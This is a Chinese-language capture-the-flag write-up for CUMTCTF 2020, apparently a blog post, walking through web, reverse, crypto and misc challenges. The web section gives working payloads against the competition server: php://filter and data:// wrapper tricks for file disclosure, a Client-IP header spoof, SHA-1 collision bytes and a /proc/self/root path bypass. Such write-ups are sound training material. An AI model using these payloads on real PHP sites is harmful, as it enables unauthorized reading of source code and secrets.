Theoyu²

Theoyu²

关注
发信
关注(28)粉丝(399)

CUMTCTF'2020 已做wp

WEB

Web签到

CUMTCTF'2020 已做wp-LMLPHP

payload http://202.119.201.197:13001/?1

CUMTCTF'2020 已做wp-LMLPHP

hackbar payload 2=2 出现源码

CUMTCTF'2020 已做wp-LMLPHP

猜测flag在flag.php里(可以访问无结果),利用php伪协议payload http://202.119.201.197:13001/?1&file=php://filter/read=convert.base64-encode/resource=./flag.php

页面回显flag:PD9waHANCgkkZmxhZz0iQ1VNVENURnsxNzkwNTViNC1lOGY1LTQyZDItYmZlNC0wMjdkMTVlOTQ2YjJ9Ijs=

base64解密得到最终flag:CUMTCTF{179055b4-e8f5-42d2-bfe4-027d15e946b2}

Secret

进入页面除了一张帅照没有任何信息,尝试用御剑扫描后台,发现www.zip文件 下载得到源码

<!DOCTYPE html>
<html ><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">
        <title>Secret?</title>
        <h1>The dream of a great singer</h1>
<img src="./secret.jpg"  alt="The dream of a great singer" />
</html>
<?php
error_reporting(0);
include_once('flag.php');
if(isset($_GET['param1']))
{
    $str1=$_GET['param1'];
    if(file_get_contents($str1)!=='Suvin_wants_a_girlfriend')
        die("Suvin doesn't like you");
    if(isset($_GET['param2'])){
        $str2=$_GET['param2'];
        if(!is_numeric($str2))
            die('Suvin prefers strings of Numbers');
        else if($str2<3600*24*30)
            die('Suvin says the num is too short');
        else if($str2>3600*24*31)
            die('Suvin says the num is too long');
        else {
            echo "Suvin says he's falling in love with you!"."</br>";
            sleep(intval($str2));
        }
        if (isset($_POST['param1']) && isset($_POST['param2'])) {
            $str1=$_POST['param1'];
            $str2=$_POST['param2'];
            if(strlen($str1)>1000)
                die("It's too long");
            if(((string)$str1!==(string)$str2)&&(sha1($str1)===sha1($str2)))
                echo $flag;
            else
                die("It's so similar to md5");
        }
    }
}
?>

  • 第一层 data协议 payload param1=data://text/plain,Suvin_wants_a_girlfriend

  • 第二层 科学计数法 payload param2=2.592E6

  • 第三层 下意识反应是传入数组让sha1返回false然后成功绕过,但问题是前面还有strings处理会导致同样相等,看来这里这里只能找到sha1真碰撞。谷歌曾提供了两份不一样的pdf,但它们前320位的sha1值却是相等的。下面是两个文件的16进制:

    • pdf1:

      25 50 44 46 2D 31 2E 33 0A 25 E2 E3 CF D3 0A 0A
      0A 31 20 30 20 6F 62 6A 0A 3C 3C 2F 57 69 64 74
      68 20 32 20 30 20 52 2F 48 65 69 67 68 74 20 33
      20 30 20 52 2F 54 79 70 65 20 34 20 30 20 52 2F
      53 75 62 74 79 70 65 20 35 20 30 20 52 2F 46 69
      6C 74 65 72 20 36 20 30 20 52 2F 43 6F 6C 6F 72
      53 70 61 63 65 20 37 20 30 20 52 2F 4C 65 6E 67
      74 68 20 38 20 30 20 52 2F 42 69 74 73 50 65 72
      43 6F 6D 70 6F 6E 65 6E 74 20 38 3E 3E 0A 73 74
      72 65 61 6D 0A FF D8 FF FE 00 24 53 48 41 2D 31
      20 69 73 20 64 65 61 64 21 21 21 21 21 85 2F EC
      09 23 39 75 9C 39 B1 A1 C6 3C 4C 97 E1 FF FE 01
      73 46 DC 91 66 B6 7E 11 8F 02 9A B6 21 B2 56 0F
      F9 CA 67 CC A8 C7 F8 5B A8 4C 79 03 0C 2B 3D E2
      18 F8 6D B3 A9 09 01 D5 DF 45 C1 4F 26 FE DF B3
      DC 38 E9 6A C2 2F E7 BD 72 8F 0E 45 BC E0 46 D2
      3C 57 0F EB 14 13 98 BB 55 2E F5 A0 A8 2B E3 31
      FE A4 80 37 B8 B5 D7 1F 0E 33 2E DF 93 AC 35 00
      EB 4D DC 0D EC C1 A8 64 79 0C 78 2C 76 21 56 60
      DD 30 97 91 D0 6B D0 AF 3F 98 CD A4 BC 46 29 B1

    • pdf2:

      25 50 44 46 2D 31 2E 33 0A 25 E2 E3 CF D3 0A 0A
      0A 31 20 30 20 6F 62 6A 0A 3C 3C 2F 57 69 64 74
      68 20 32 20 30 20 52 2F 48 65 69 67 68 74 20 33
      20 30 20 52 2F 54 79 70 65 20 34 20 30 20 52 2F
      53 75 62 74 79 70 65 20 35 20 30 20 52 2F 46 69
      6C 74 65 72 20 36 20 30 20 52 2F 43 6F 6C 6F 72
      53 70 61 63 65 20 37 20 30 20 52 2F 4C 65 6E 67
      74 68 20 38 20 30 20 52 2F 42 69 74 73 50 65 72
      43 6F 6D 70 6F 6E 65 6E 74 20 38 3E 3E 0A 73 74
      72 65 61 6D 0A FF D8 FF FE 00 24 53 48 41 2D 31
      20 69 73 20 64 65 61 64 21 21 21 21 21 85 2F EC
      09 23 39 75 9C 39 B1 A1 C6 3C 4C 97 E1 FF FE 01
      7F 46 DC 93 A6 B6 7E 01 3B 02 9A AA 1D B2 56 0B
      45 CA 67 D6 88 C7 F8 4B 8C 4C 79 1F E0 2B 3D F6
      14 F8 6D B1 69 09 01 C5 6B 45 C1 53 0A FE DF B7
      60 38 E9 72 72 2F E7 AD 72 8F 0E 49 04 E0 46 C2
      30 57 0F E9 D4 13 98 AB E1 2E F5 BC 94 2B E3 35
      42 A4 80 2D 98 B5 D7 0F 2A 33 2E C3 7F AC 35 14
      E7 4D DC 0F 2C C1 A8 74 CD 0C 78 30 5A 21 56 64
      61 30 97 89 60 6B D0 BF 3F 98 CD A8 04 46 29 A1

    然后将文件前320位url编码使用就可以了

    CUMTCTF&#39;2020 已做wp-LMLPHP

    对了 注意记住post传输时最好用burp,因为hackbar post是url编码前的,会导致失败。

CUMTCTF&#39;2020 已做wp-LMLPHP

简单的文件包含

根据问题,首先想到X-Forwarded-For: 127.0.0.1 被揭穿,尝试用Client-ip: 127.0.0.1 成功,得到源码,其中最关键一句

include_once("flag.php");
if(isset($_POST['f']))
  include_once($_POST['f']);

发现常规payload f=php://filter/convert.base64-encode/resource=./falg,php已经没有反应,通过查阅https://www.anquanke.com/post/id/213235得知可以payload f=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php

得到base64加密flag,解码即可

Re

连签到的分都不给你

ida打开 直接可以看到flag

兄弟们快来帮帮葡葡

upx脱壳,ida打开就能看到flag

python题禁止python

注意第106行BINARY_XOR,python脚本:

a=[80,70,94,71,80,71,85,104,86,39,64,106,76,67,106,71,123,92,125,76,37,106,103,118,80,35,119,32,110]
result=""
for i in range(len(a)):
    result+=chr(a[i]^19)
print(result)

即可输出flag

CRYPOT

幼儿园的密码题

RSA加密,已知e,n,c, 先把三个数都化为十进制,在在线网站分解nhttp://factordb.com/得到p,q,再利用工具(自己写也可)RSA-tools2 输入p,q,n找到d

CUMTCTF&#39;2020 已做wp-LMLPHP

再利用python脚本得到flag

e = 65537

n = 106521084065274837947153338013414677016150003618052696631715598225251903811631

C = 40448992051548719008529549070468060415257485938698092782029814901918646701101

d = 40136589253519337904801936751808322538729097075790793658605275357454779780497

M = pow(C,d,n)
print(M)
print('------------')
print(hex(M)[2:])                      #16进制明文
print('------------')
print(bytes.fromhex(hex(M)[2:]))       #16进制转文本

小学生的密码题

给出加密方式和密文求明文,由 ord("A"), ord("}") **+** 1发现完全可以爆破偷鸡(虽然也是小学生题),python脚本:

def encode(ptext):
    dic = [chr(i) for i in range(ord("A"), ord("}") + 1)]
    m = [i for i in ptext]
    tmp = [];s = []
    for i in range(len(m)):
        for j in range(len(dic)):
            if m[i] == dic[j]:
                tmp.append(j + 1)
    for i in tmp:
        res = ""
        if i >= 8:
            res += int(i/8)*"8"
        if i%8 >=4:
            res += int(i%8/4)*"4"
        if i%4 >=2:
            res += int(i%4/2)*"2"
        if i%2 >= 1:
            res += int(i%2/1)*"1"
        return res

st = "21088410841088402108840420888888821088810888884210888888410888421088881088888820888841088842108820888881088884210888880888888408888888410".split('0')
a = 0
result = ""
for i in range(len(st)):
    for j in range(ord('A'), ord('}')+1):
        if encode(chr(j))  == st[a]:
            a = a + 1
            result += chr(j)
            break
print(result)

MISC

连签到都算不上

打开txt,base64转图片,将得到的编码\u81ea\u7531\u548c\u8c10\u5e73\u7b49\u5e73\u7b49\u81ea\u7531\u8bda\u4fe1\u548c\u8c10\u5e73\u7b49\u81ea\u7531\u81ea\u7531\u548c\u8c10\u5e73\u7b49\u81ea\u7531\u81ea\u7531\u516c\u6b63\u6cd5\u6cbb\u53cb\u5584\u5e73\u7b49\u5e73\u7b49\u6cd5\u6cbb\u548c\u8c10\u548c\u8c10\u516c\u6b63\u8bda\u4fe1\u6587\u660e\u516c\u6b63\u548c\u8c10\u548c\u8c10\u5bcc\u5f3a\u516c\u6b63\u8bda\u4fe1\u548c\u8c10\u548c\u8c10\u548c\u8c10\u5e73\u7b49\u8bda\u4fe1\u5e73\u7b49\u548c\u8c10\u6587\u660e\u5e73\u7b49\u8bda\u4fe1\u5e73\u7b49\u81ea\u7531\u548c\u8c10\u5e73\u7b49\u81ea\u7531\u81ea\u7531\u516c\u6b63\u6587\u660e\u6c11\u4e3b\u6cd5\u6cbb\u8bda\u4fe1\u548c\u8c10\u000d\u000a

Unicode转中文得到

自由和谐平等平等自由诚信和谐平等自由自由和谐平等自由自由公正法治友善平等平等法治和谐和谐公正诚信文明公正和谐和谐富强公正诚信和谐和谐和谐平等诚信平等和谐文明平等诚信平等自由和谐平等自由自由公正文明民主法治诚信和谐

在前往在线核心价值观编码解码即可http://ctf.ssleye.com/cvencode.html

真·签到题

把下载得到的图片丢进010,在尾部发现base64编码,解码得到EWOVEVH{U1ip_kp_uweeguuhw11a!},由形式看出来为凯撒加密,位移为2,解密得到flag:CUMTCTF{S1gn_in_successfu11y!}

09-26 09:34
Powered by LMLPHP ©2024 Theoyu² 0.074247